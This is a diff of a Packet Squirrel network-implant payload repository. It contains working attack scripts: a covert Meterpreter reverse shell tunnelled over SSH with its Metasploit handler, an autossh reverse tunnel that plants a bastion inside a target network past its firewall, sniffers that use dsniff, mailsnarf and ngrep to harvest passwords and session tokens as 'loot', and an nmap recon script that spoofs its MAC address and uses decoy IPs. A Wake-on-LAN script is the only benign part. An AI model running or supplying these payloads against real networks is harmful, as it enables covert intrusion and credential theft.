@@ -1,74 +0,0 @@
#!/bin/bash
# Title: Meterpreter-via-SSH
# Description: Covert meterpreter shell via overt SSH connection
# Author: Zappus
# Version: 1.0
# Category: Remote-Access
# Net Mode: NAT
# Firmware: 1.2
#
# LED State Descriptions
# Magenta Solid - Configuring NETMODE
# LED OFF - Waiting for BUTTON
# Red Blink 2 Times - SSH Connection Failed
# Amber Blink 5 Times - SSH Connection Successful
# Red Blink 1 Time - Meterpreter Failed
# Cyan Blink 1 Time - Meterpreter Successful
SSH_USER="username"
SSH_HOST="hostname"
MSF_PORT=31337
function start()
{
LED SETUP
NETMODE NAT
sleep 5
LED OFF
# Wait until BUTTON is pressed
while true
do
NO_LED=1 BUTTON && {
# close any existing meterpreter and SSH connections
kill `pgrep php` 2> /dev/null
kill `pgrep -x ssh` 2> /dev/null
sleep 2
# Establish connection to remote SSH server
ssh -f -N -T -M -L $MSF_PORT:127.0.0.1:$MSF_PORT $SSH_USER@$SSH_HOST
# Check if SSH connection worked
if [ -z `pgrep -x ssh` ]
then
LED FAIL
sleep 5
LED OFF
continue
else
LED STAGE1
sleep 5
fi
# Start meterpreter reverse shell
meterpreter-php 127.0.0.1 $MSF_PORT &
sleep 2
# Check if meterpreter shell started
if [ -z `pgrep php` ]
then
# Close SSH connection because meterpreter failed
kill `pgrep -x ssh` 2> /dev/null
LED FAIL
else
LED SPECIAL
fi
sleep 1
LED OFF
}
done
}
# Start the payload
start &

9
payloads/library/remote-access/Meterpreter-via-SSH/server.rc
View File

@@ -1,9 +0,0 @@
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set EnableContextEncoding false
set DisablePayloadHandler false
set ExitOnSession false
set ListenerTimeout 0
set LHOST 127.0.0.1
set LPORT 31337
run -j

88
payloads/library/remote-access/SSH-remote-access/payload.sh
View File

@@ -1,88 +0,0 @@
#!/bin/bash
# Title: SSH Remote Management Tool for Packet Squirrel
# Description: Makes packet Squirrel directly accessible via SSH on a remote server
# Author: BlackPropaganda
# Version: 0.5
# Category: Remote-Access
# Net Mode: NAT
# Firmware: 3.2
#
# LED State Descriptions
# Magenta Solid - SSH connecting
# Amber - SSH connection attempted
#
NETMODE NAT
LED SETUP
# no pass needed, headless mode required so RSA key file is used.
#
# generate the key by running the following command in the /root/.ssh/ folder:
# 'ssh -t rsa -b 2048 -f id_rsa'
#
# To ensure that this works as intended, the user will have to connect to this host at least once
# with ssh -i /root/.ssh/id_rsa username@remote_server_ip to add this server to the squirrels list
# of trusted hosts.
#
# If this step fails, the payload will fail.
autossh_host="root@<remote server IP>"
autossh_host_ip=$(echo $autossh_host | cut -d '@' -f2)
autossh_port="22"
autossh_remoteport="2222"
autossh_localport="22"
switch=SWITCH
interface="eth1"
if ! grep $autossh_host_ip /root/.ssh/known_hosts; then
echo "$autossh_host not in known_hosts, exiting..." >> /root/autossh.log
LED FAIL
exit 1
fi
#
# For the life of me I couldn't get SSH to work. The funny thing was it would
# run in the shell command, but not in the payload. The following solution
# implements a tool called autossh which ensures nothing funky happens to the
# connection.
#
# the following was ripped from dark_pyrro (the legend) via:
# https://codeberg.org/dark_pyrro/Packet-Squirrel-autossh/src/branch/main/payload.sh
#
# waiting until eth1 acquires IP address
while ! ifconfig "$interface" | grep "inet addr"; do sleep 1; done
echo -e "starting server.\n" >> /root/payloads/$switch/debug.txt
# starting sshd and waiting for process to start
/etc/init.d/sshd start
until netstat -tulpn | grep -qi "sshd"
do
sleep 1
done
# stopping autossh
/etc/init.d/autossh stop
#
# Much like the SSH server, AutoSSH has a configuration file. This
# needs to be configured to support this connection as a daemon.
#
# Create a "fresh template" for the autossh configuration
# Starting with an empty autossh file in /etc/config
# isn't something that uci is very fond of
echo "config autossh" > /etc/config/autossh
echo " option ssh" >> /etc/config/autossh
echo " option enabled" >> /etc/config/autossh
# UCI configuration and commission
uci set autossh.@autossh[0].ssh="-i /root/.ssh/id_rsa -R "$autossh_remoteport":127.0.0.1:"$autossh_localport" "$autossh_host" -p "$autossh_port" -N -T"
uci set autossh.@autossh[0].enabled="1"
uci commit autossh
LED ATTACK
# starting autossh
/etc/init.d/autossh start

117
payloads/library/remote-access/SSH-remote-access/readme.md
View File

@@ -1,117 +0,0 @@
#Squirrel SSH Remote Access
____
### Concept:
The Packet Squirrel is a powerful tool for network implants. One operational issue with an implant of this nature
is that it cannot function beyond the pre-programmed payloads.
Using techniques like Dynamic Port Forwarding (SOCKS/SSH), this payload allows the user to create a Bastion
inside a target network. This bastion allows the user to bypass less sophisticated firewall configurations,
like so:
Remote SSH Host Target Behind Firewall
___ ___
/ /| / /|
/__/ | <====[ X ]====> /__/ |
|--| | |--| |
| *|/ | *|/
Remote SSH Host Packet Squirrel Target Behind Firewall
___ (inside LAN) ___
/ /| _______ / /|
/__/ | <=====> /______/`) <=====> /__/ |
|--| | (__[__]_)/ |--| |
| *|/ | *|/
This assumes SSH is not denied by default on the targets' outbound firewall configuration. One limitation
is that this tool is susceptible to detection via NIDS. Multiple outbound connections and high-bandwidth
utilization raises suspicion of potential attack, however this is only a concern for more sophisticated
targets.
---
# SSH Server Configuration
---
A good background for this payload is this video that Darren made doing this on the Lan Turtle:
https://www.youtube.com/watch?v=uIdvvrDrRj0
This payload requires an SSH server be operational somewhere on the internet. Typically, a password
is required to acquire shell access to these servers. This is a pain if you're trying to do everything
automatically, so openssh allows for cryptographic pubkey authentication. More on this here:
https://www.redhat.com/sysadmin/key-based-authentication-ssh
Firstly, for security reasons you may want to create a user account specifically for this payload.
The reasoning is if the squirrel is lost or stolen someone has a key to your server, to mitigate this
threat, if the squirrel is lost in a contested environment, deleting the user will block access.
On most linux systems, the command is either 'useradd' or 'adduser', but this is distro specific.
After you create the user and are prompted with the new user password, bear in mind to save it because
you will need it during the pubkey installation process.
useradd squirrel
Password-less authentication to a specific user account can be obtained by first enabling this in
the openssh configuration file. This file is most commonly found in /etc/ssh/sshd_config and changing the line
'PubkeyAuthentication no' to 'PubkeyAuthentication yes'. Or, if your version does not have this,
you can append this line near the top of the configuration file under the authentication category, like so:
# Authentication:
#LoginGraceTime 2m
#PermitRootLogin prohibit-password
#StrictModes yes
#MaxAuthTries 6
#MaxSessions 10
PubkeyAuthentication yes
# Expect .ssh/authorized_keys2 to be disregarded by default in future.
AuthorizedKeysFile .ssh/authorized_keys .ssh/authorized_keys2
Also ensure that your AuthorizedKeysFile is present in your new users home directory.
Secondly, on an SSH client, you will need to generate the key. For the sake of demonstration,
we will use RSA 2048-bit keys, but you can use any of the following, such as dsa, ecdsa, ed25519 and rsa.
Keep in mind that the squirrel is a tiny computer and may have trouble with higher-bit symmetrical keys
like RSA 4096. If you are noticing performance problems, ecdsa and ed25519 are 'as secure' as RSA but require
less intensive computations to encrypt and decrypt data. Choose your poison.
here's the command to generate a key and place it in the current working directory. When you create it,
it's best if you don't leave a password since this file will need to be readable without your input.
so when prompted for a password just press 'enter' in the terminal. Note that this will create two files.
First, the private key, then the pubkey.
ssh-keygen -t rsa -b 4096 -f id_rsa
After we generate the SSH key, we need to install it on our remote SSH server. We can do this by entering the following
into a terminal in the same directory. This will prompt the user for the password.
ssh-copy-id -i id_rsa squirrel@<ssh_server_ip>
To test the connection, you can enter this into the terminal:
ssh -i id_rsa squirrel@<ssh_server_ip>
After confirming that the key-based authentication works, now it's time to configure the squirrel.
In arming mode, secure copy the key to the /root/.ssh/ directory in the squirrel by running:
scp id_rsa root@172.16.32.1:/root/.ssh/id_rsa
You will be prompted for a password and then the file will be uploaded.
Then, you need to connect to the ssh server at least once so the squirrel adds this server to the list
of known_hosts. More on this on the ssh man page. While in the squirrel, execute this:
ssh -i /root/.ssh/id_rsa squirrel@<ssh_server_ip>
you will be prompted whether or not to add the host signature to known hosts, enter 'y'. Then,
configure the payload to use your ssh user and IP address, then the payload should make the squirrels
ssh server available at 127.0.0.1 on port 2222 on the ssh server.
Goes without saying, but use at your own risk. Don't do bad things.

61
payloads/library/remote-access/Togglable-VPN/payload.sh
View File

@@ -1,61 +0,0 @@
#!/bin/bash
#
# Title: Togglable-VPN
# Description: Based on the default VPN payload; this can now create a VPN-connection to an OpenVPN-server,
# or if the button is pressed, send traffic from the clients through said tunnel.
# This way no editing of the payload is required to switch modes.
# On boot the Squirrel will wait for a button press for 10 seconds, if it is pressed, the VPN will
# launch in client mode, if it is not pressed in the interval it will launch in remote-access mode.
# Author: DannyK999
# Credit: Credit to Hak5 for original VPN payload.
# Version: 1.0
# Category: remote-access
# Target: Any
# Net Mode: BRIDGE, VPN
DNS_SERVER="8.8.8.8"
# Cheap hack to set the DNS server
function setdns() {
while true
do
[[ ! $(grep -q "$DNS_SERVER" /tmp/resolv.conf) ]] && {
echo -e "search lan\nnameserver $DNS_SERVER" > /tmp/resolv.conf
}
sleep 5
done
}
function start() {
LED SETUP
DIR=$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)
# Check for button press to see whether to set NETMODE to BRIDGE or VPN
# and wait 3 seconds to ensure that things can settle
BUTTON 10s && {
/usr/bin/NETMODE VPN
} || {
/usr/bin/NETMODE BRIDGE
}
sleep 3
# Make OpenVPN use the local configuration
uci set openvpn.vpn.config="${DIR}/config.ovpn"
uci commit
# Start the OpenVPN server in the background
/etc/init.d/openvpn start
# Start SSH Server
/etc/init.d/sshd start &
# Set DNS server
setdns &
LED ATTACK
}
# Start the payload
start &

0
payloads/library/remote-access/openvpn/config.ovpn
View File

62
payloads/library/remote-access/openvpn/payload.sh
View File

@@ -1,62 +0,0 @@
#!/bin/bash
#
# Title: OpenVPN
# Description: Create a connection to a VPN-connection to an OpenVPN-server. Optionally: Send traffic from the clients through said tunnel.
# Author: Hak5
# Version: 1.0
# Category: remote-access
# Target: Any
# Net Mode: BRIDGE, VPN
# Set to 1 to allow clients to use the VPN
FOR_CLIENTS=0
DNS_SERVER="8.8.8.8"
# Cheap hack to set the DNS server
function setdns() {
while true
do
[[ ! $(grep -q "$DNS_SERVER" /tmp/resolv.conf) ]] && {
echo -e "search lan\nnameserver $DNS_SERVER" > /tmp/resolv.conf
}
sleep 5
done
}
function start() {
LED SETUP
DIR=$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)
# Update factory default payload
cp ${DIR}/payload.sh /root/payloads/switch3/payload.sh
# Set NETMODE to BRIDGE and wait 3 seconds
# to ensure that things can settle
[[ "$FOR_CLIENTS" == "1" ]] && {
/usr/bin/NETMODE VPN
} || {
/usr/bin/NETMODE BRIDGE
}
sleep 3
# Make OpenVPN use the local configuration
uci set openvpn.vpn.config="${DIR}/config.ovpn"
uci commit
# Start the OpenVPN server in the background
/etc/init.d/openvpn start
# Start SSH Server
/etc/init.d/sshd start &
# Set DNS server
setdns &
LED ATTACK
}
# Start the payload
start &

61
payloads/library/sniffing/ispyintel/README.md
View File

@@ -1,61 +0,0 @@
| | |
|:----------------|:---------------------------------------------------------------------------------------------------|
| **Title** | iSpy Passive Intel Gathering |
| **Description** | Launches various tools to sniff out intel data. Payload will run until the button is pressed. |
| **Author** | [infoskirmish.com](http://www.infoskirmish.com) |
| **Version** | 1.0 |
| **Category** | sniffing |
| **Target** | Any |
| **Net Mode** | Any (you choose) |
| Meaning | Color | Description |
|:----------|:-----------------:|:----------------------------|
| SUCCESS: | Blink Green | Payload ended complete |
| CLEAN UP: | Rapid White | Payload is shutting down |
| FAIL: | Blink Red | No USB storage found |
| ATTACK: | Blink Yellow | Payload is loging traffic |
This payload will automate gathering various recon data on whatever passes between it's Ethernet ports. Since all the data log file names are marked with a unique date stamp you can freely move from target to target deploy, gather, collect, move on without fear you are overwriting previous logs.
### **Requirements**
+ USB access to store loot.
### **Setup**
1. Edit the config variables at the top.
The main variables are:
lootPath="/mnt/loot/intel" # Path to loot
mode="TRANSPARENT" # Network mode we want to use
interface="br-lan" # Interface to listen on
2) Copy payload.sh into the ~/payloads/switch<n> folder you wish to deploy on.
3) Connect into a target machine with access to the LAN.
4) Set switch to the <n> spot and power up.
5) Leave, get coffee, take a nap while everything is recorded and parsed for future use.
6) When done; hit the button. The LED will rapidly flash white to let you know it is finishing up.
7) When all is done the LED will just go blank. It is now safe to unplug and go about your day.
### **Tasks that are started**
| Task | About |
|:---------|:-----------------------------------------------------------------------------|
|tcpdump | So you have a record of every packet that was TX and RX |
|urlsnarf | So you can see all websites that were visited |
|dsniff | Will attempt to acquire passwords and what not |
|ngrep | On ports 80 and 21 with the filter for common password fields |
|ngrep | On ports 80 and 21 with the filter for common session id fields |
|log.txt | Logs the progress of the payload for easy troubleshooting. |
### **Clean Up**
Once completed (aka when the button is pressed) the payload will automatically parse the TCPDump log file for the following items and store the results in separate files. Note the TCPDump raw pcap file is left unharmed and still freely available for your dissecting pleasure.
As this process can take some time the LED will change to a rapid white blink letting you know the button command was recieved and the payload is in the process of shutting down.
+ ipv4found.txt Will contain a unique list of all the ipv4 which the pcap file contains
+ maybeEmails.txt Is a very loose search for possible email addresses that came across the wire in plain text.

184
payloads/library/sniffing/ispyintel/payload.sh
View File

@@ -1,184 +0,0 @@
#!/bin/bash
#
# Title: iSpy Passive Intel Gathering
# Description: Launches various tools to sniff out intel data.
# Payload will run until the button is pressed.
# Author: infoskirmish.com
# Version: 1.0
# Category: sniffing
# Target: Any
# Net Mode: Any (default: Transparent)
# LEDs
# SUCCESS: Payload ended complete
# FAIL: No USB storage found
lootPath="/mnt/loot/intel" # Path to loot
mode="TRANSPARENT" # Network mode we want to use
interface="lo" # Interface to listen on
Date=$(date +%Y-%m-%d-%H%M) # Date format to use for log files
dsnifflog="dsniff_$Date.log" # DSNiff log file name
urlsnifflog="urlsnarf_$Date.log" # URLSniff log file name
tcpdumplog="tcpdump_$Date.pcap" # TCPDump log file name
httppwdlog="httpPasswords_$Date.pcap" # Potential HTTP password file name
sessionidlog="sessionids_$Date.pcap" # Potential Session IDs file name
mailsnarfLog="mailsnarf_$Date.log" # Mailsnarf data log file path.
function monitor_space() {
while true
do
[[ $(df | grep /mnt | awk '{print $4}') -lt 10000 ]] && {
kill $1
LED G SUCCESS
sync
break
}
sleep 5
done
}
function finish() {
# Kill URLSnarff
echo "URLSnarff ending pid=$1" >> $1/log.txt
kill $1
wait $1
# Kill DNSniff
echo "DNSniff ending pid=$2" >> $2/log.txt
kill $2
wait $2
# Kill TCPDump
echo "TCPDump ending pid=$3" >> $3/log.txt
kill $3
wait $3
# Kill HTTP Password NGREP
echo "HTTP Password NGREP ending pid=$4" >> $4/log.txt
kill $4
wait $4
# Kill Session NGREP
echo "HTTP Session NGREP ending pid=$5" >> $5/log.txt
kill $5
wait $5
# Kill Mail Snarf
echo "Mail Snarf ending pid=$6" >> $6/log.txt
kill $6
wait $6
# I found that if this payload had been running awhile the next two steps may take a bit. It is useful to have some kind of indication
# that the payload accepted your button push and is responding. Thus the rapid white blink.
LED W VERYFAST
# Dump all unique IP address from TCP Dump file.
tcpdump -qns 0 -X -r $lootPath/$tcpdumplog | grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" | sort | uniq >> $lootPath/ipv4found_$Date.txt
# Ok this is a really stupid grep pattern matching to search for emails; it is meant to give an over view of what is possible.
tcpdump -qns 0 -X -r $lootPath/$tcpdumplog | grep -Eiv "[\.]{2}" | grep -oE "\b[a-zA-Z0-9.-]+@[a-zA-Z0-9.-]+\.[a-zA-Z0-9.-]+\b" | sort | uniq >> $lootPath/maybeEmails_$Date.txt
sync
# Indicate successful shutdown
LED R SUCCESS
sleep 1
# Halt the system; turn off LED
LED OFF
halt
}
function run() {
# Create loot directory
mkdir -p $lootPath &> /dev/null
# Start tcpdump on the specified interface
tcpdump -i $interface -w $lootPath/$tcpdumplog &>/dev/null &
tpid=$!
# Log TCP Dump Start
echo "TCPDump started pid=$tpid" >> $lootPath/log.txt
# Start urlsnarff on the specified interface
urlsnarf -n -i $interface >> $lootPath/$urlsnifflog &
urlid=$!
# Log URL Snarff Start
echo "URLSnarf started pid=$urlid" >> $lootPath/log.txt
# Start dsniff on the specified interface
dsniff -c -m -i $interface -w $lootPath/$dsnifflog &
dsniffid=$!
# Log DSNiff Start
echo "DSNiff started pid=$dsniffid" >> $lootPath/log.txt
# Log potential plain text user names and passwords on port 80 and 21
# The thing is port 21 is the defult ftp port. Passwords and user names are exchanged in clear text!!!
ngrep -d $interface -i "user_pass|userid|pass|pwd|password|login|user_login|usr|USER" -W byline port 80 or port 21 -O $lootPath/$httppwdlog &
pwdgrep=$!
# Log Password NGREP Start
echo "Password NGREP started pid=$pwdgrep" >> $lootPath/log.txt
# Log potential plain text session ids, tokens, etc.
ngrep -d $interface -i "session|sessid|token|loggedin|PHPSESSID|CFTOKEN|CFID|JSESSIONID|sessionid" -W byline port 80 or port 21 -O $lootPath/$sessionidlog &
sessiongrep=$!
# Log Session NGREP Start
echo "Session NGREP started pid=$sessiongrep" >> $lootPath/log.txt
# Log mailsnarf data
mailsnarf -i $interface $lootPath/$mailsnarflog &
mailsnarfid=$!
# Log mailsnarf Start.
echo "Mailsnarf started pid=$mailsnarfid" >> $lootPath/log.txt
# Wait for button to be pressed (disable button LED)
NO_LED=true BUTTON
finish $urlid $dsniffid $tpid $pwdgrep $sessiongrep $mailsnarfid
}
# This payload will only run if we have USB storage
if [ -d "/mnt/loot" ]; then
# Set networking to TRANSPARENT mode and wait five seconds
NETMODE $mode >> $lootPath/log.txt
sleep 5
# Lets make sure the interface the user wanted actually exisits.
if [[ $(ifconfig |grep $interface) ]]; then
echo "" > $lootPath/log.txt
LED ATTACK
run &
monitor_space $! &
else
# Interface could not be found; log it in ~/payload/switch1/log.txt
ifconfig > $lootPath/log.txt
echo "Could not load interface $interface. Stopping..." >> $lootPath/log.txt
# Display FAIL LED
LED FAIL
fi
else
# USB storage could not be found; log it in ~/payload/switch1/log.txt
echo "Could not load USB storage. Stopping..." > log.txt
# Display FAIL LED
LED FAIL
fi

75
payloads/library/sniffing/ngrep/payload.sh
View File

@@ -1,75 +0,0 @@
#!/bin/bash
# ngrep payload to snag creds
NGREP_OPTIONS=("-wiql" "user|pass" "port" "21")
CONDITION=""
WCNUM=3
BUTTON_WAIT="5s"
LOOT_DIR="/mnt/loot/ngrep"
LOG_FILE="${LOOT_DIR}/ngrep-${RANDOM}.log"
function syncFS() {
while true
do
sync
sleep 5
done
}
function setup() {
LED OFF
NETMODE TRANSPARENT
sleep 5
mkdir -p $LOOT_DIR
}
function checkLog() {
[[ -z $CONDITION ]] && {
grep -qi $CONDITION $LOG_FILE && {
return 0
}
} || {
[[ $(wc -l < $LOG_FILE) -gt $WCNUM ]] && {
return 0
}
}
return 1
}
function run() {
ngrep "${NGREP_OPTIONS[@]}" 2>&1 > $LOG_FILE &
npid=$!
while true
do
NO_LED=true BUTTON && {
checkLog && {
BUTTON $BUTTON_WAIT && {
LED FINISH
kill $npid
sleep 3
LED OFF
halt
}
} || {
LED FAIL
sleep 3
LED OFF
}
}
done
}
[[ ! -f /mnt/NO_MOUNT ]] && {
setup
syncFS &
run
} || {
LED FAIL
}

12
payloads/library/sniffing/ngrep/readme.md
View File

@@ -1,12 +0,0 @@
# ngrep payload
Credits: Hak5Darren, Sebkinne
Small Edit: SebSeifert
# Description
Does packet sniffing stuff
If the Button is pressed you have x seconds to push the button one more time. If pressed the payload ends and cleans up. Else it keeps running.
## Options
BUTTON_WAIT = The seconds you can wait until the button must be pressed to end the payload.

4
payloads/library/recon/nmapdump/README.md → payloads/recon/nmapdump/README.md
View File

@@ -4,7 +4,7 @@ Description: Dumps NMap scan data to USB storage.
Author: infoskirmish.com
Version: 1.0
Version: 2.0
Category: sniffing
@@ -26,3 +26,5 @@ This payload will launch NMap on a given interface (default eth0) and scan the l
The payload will store scan files in all three file types supported by nmap. Also the payload will create a log.txt file to dump process information which may be useful to troubleshoot errors. The default path is /mnt/loot/nmapdump
The payload has common variables that maybe changed located at the top of the file making customizing this payload as your deployment needs dictate.
Updated for the Packet Squirrel Mark II by Hak5

73
payloads/library/recon/nmapdump/payload.sh → payloads/recon/nmapdump/payload.sh
View File

@@ -1,13 +1,18 @@
#!/bin/bash
#
# This payload is for the original Packet Squirrel. It may not work on
# the Packet Squirrel Mark II
#
# Title: NMap Dump
# Description: Dumps NMap scan data to USB storage.
# Author: infoskirmish.com
# Version: 1.0
# Version: 2.0
# Category: sniffing
# Target: Any
# Net Mode: TRANSPARENT
# Updated to the Packet Squirrel Mark II by Hak5
# LEDs
# SUCCESS: Scan complete
# FAIL: No USB storage found
@@ -15,19 +20,36 @@
#### Constants ####
defaultInterface="lo" # If you know which interface will allow outbound traffic you can specify it here
# leaving it blank will enable the payload trying to attempt to figure out which
# interface to use.
# If you know which interface will allow outbound traffic you can specify it here
# leaving it blank will enable the payload trying to attempt to figure out which
# interface to use.
defaultInterface="lo"
rndDecoyNumber=5 # Number of decoy IPs to spawn
spoofDevType="Cisco" # Spoof the MAC of this device type
netSleep=10 # Seconds to sleep while loading NAT
mode="TRANSPARENT" # Squirrel NETMOD TRANSPARENT | BRDIGE | NAT | VPN | NONE (this won't kick you off ssh session)
onEnd="halt" # When done what should we do? reboot | halt | nothing | poweroff
# Number of decoy IPs to spawn
rndDecoyNumber=5
lootPath="/mnt/loot/nmapdump" # Path to store results
lootFileNameScheme="nmapdump_$(date +%Y-%m-%d-%H%M)" # File name scheme
# Spoof the MAC of this device type
spoofDevType="Cisco"
# Seconds to sleep while loading NAT
netSleep=10
# Squirrel NETMODE TRANSPARENT | BRDIGE | NAT | NONE
# BRIDGE mode will preserve the Squirrel IP
mode="BRIDGE"
# When done what should we do? reboot | halt | nothing | poweroff
onEnd="halt"
# Path to store results
lootPath="/usb/loot/nmapdump"
# File name scheme
lootFileNameScheme="nmapdump_$(date +%Y-%m-%d-%H%M)"
# Clear the log every run?
clearLogs=true
#### Payload Code ####
@@ -57,6 +79,11 @@ function run() {
# Create loot directory
mkdir -p $lootPath &> /dev/null
# Clear the logs
if [ "${clearLogs}x" == "truex" ]; then
echo > ${lootPath}/log.txt
fi
# Set networking mode to user preferance and sleep to allow time to sync up.
# If set to NONE this will not be set and thus not kick you out of your SSH session.
@@ -239,25 +266,11 @@ function run() {
} # end run() function
USB_WAIT
# Check if we have USB storage
if [ -d "/mnt/loot" ]; then
# Show attack LED
LED ATTACK
# Clear log file
echo "" > $lootPath/log.txt
# ATTACK!!!!
run
# Show attack LED
LED ATTACK
# ATTACK!!!!
run
else
# USB storage could not be found; log it in ~/payload/switch1/log.txt
echo "Could not load USB storage. Stopping..." > log.txt
# Display FAIL LED
LED FAIL
fi

7
payloads/remote-access/wake_on_lan/README.md Normal file
View File

@@ -0,0 +1,7 @@
# Wake-on-LAN
This payload generates a WoL (Wake-on-LAN) magic packet for the devices listed in the
payload configuration.
Make sure to copy BOTH `payload` and `wol_python.py` to the SAME payload directory on
the Packet Squirrel!

37
payloads/remote-access/wake_on_lan/payload Executable file
View File

@@ -0,0 +1,37 @@
#!/bin/bash
# Title: Wake on Lan
# Description: Wake On Lan with Python
# Author: Hak5
# Configuration
# MAC addresses, separated by spaces
WOL_TARGETS="11:22:33:44:55:66 AA:BB:CC:DD:EE:FF"
# How often do we wake up systems, in seconds?
WOL_INTERVAL=30
# NAT mode
NETMODE NAT
# Set the LED
LED G SINGLE
while true; do
# Toggle the LED, send the WoL
LED W SOLID
python /root/payloads/$(SWITCH)/python_wol.py ${WOL_TARGETS}
# Wait one second for the LED to be visible
sleep 1
# Reset the LED
LED G SINGLE
# Wait the wakeup interval
sleep ${WOL_INTERVAL}
done

21
payloads/remote-access/wake_on_lan/python_wol.py Executable file
View File

@@ -0,0 +1,21 @@
#!/usr/bin/python
import sys
import socket
# Simplified function to send a wake-on-lan packet
def send_wol(destination):
sync = "FF" * 6
macs = destination * 16
payload = bytes.fromhex(sync + macs)
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
sock.sendto(payload, ("255.255.255.255", 9))
# Send a WoL packet for each MAC address we
# were called with
for mac in sys.argv[1:]:
fin_mac = mac.replace(":", "")
send_wol(fin_mac)

24
payloads/library/sniffing/tcpdump/payload.sh → payloads/sniffing/tcpdump/payload
View File

@@ -15,7 +15,7 @@
function monitor_space() {
while true
do
[[ $(df | grep /mnt | awk '{print $4}') -lt 10000 ]] && {
[[ $(USB_FREE) -lt 10000 ]] && {
kill $1
LED G SUCCESS
sync
@@ -42,14 +42,16 @@ function finish() {
function run() {
# Create loot directory
mkdir -p /mnt/loot/tcpdump &> /dev/null
mkdir -p /usb/loot/tcpdump &> /dev/null
# Set networking to TRANSPARENT mode and wait five seconds
NETMODE TRANSPARENT
sleep 5
LED ATTACK
# Start tcpdump on the bridge interface
tcpdump -i br-lan -s 0 -w /mnt/loot/tcpdump/dump_$(date +%Y-%m-%d-%H%M%S).pcap &>/dev/null &
tcpdump -i br-lan -s 0 -w /usb/loot/tcpdump/dump_$(date +%Y-%m-%d-%H%M%S).pcap &>/dev/null &
tpid=$!
# Wait for button to be pressed (disable button LED)
@@ -59,10 +61,12 @@ function run() {
# This payload will only run if we have USB storage
[[ ! -f /mnt/NO_MOUNT ]] && {
LED ATTACK
run &
monitor_space $! &
} || {
LED FAIL
}
# Wait for the USB drive
USB_WAIT
LED ATTACK
run &
monitor_space $! &
wait

12
payloads/switch1/payload.sh
View File

@@ -1,12 +0,0 @@
#!/bin/bash
#
# Title: Default Payload
# Description: Sets the NETMODE to NAT, then sets the LED to ATTACK
# Author: Hak5
# Version: 1.0
# Category: default
# Target: Any
# Net Mode: NAT
NETMODE NAT
LED ATTACK

12
payloads/switch2/payload.sh
View File

@@ -1,12 +0,0 @@
#!/bin/bash
#
# Title: Default Payload
# Description: Sets the NETMODE to NAT, then sets the LED to ATTACK
# Author: Hak5
# Version: 1.0
# Category: default
# Target: Any
# Net Mode: NAT
NETMODE NAT
LED ATTACK

12
payloads/switch3/payload.sh
View File

@@ -1,12 +0,0 @@
#!/bin/bash
#
# Title: Default Payload
# Description: Sets the NETMODE to NAT, then sets the LED to ATTACK
# Author: Hak5
# Version: 1.0
# Category: default
# Target: Any
# Net Mode: NAT
NETMODE NAT
LED ATTACK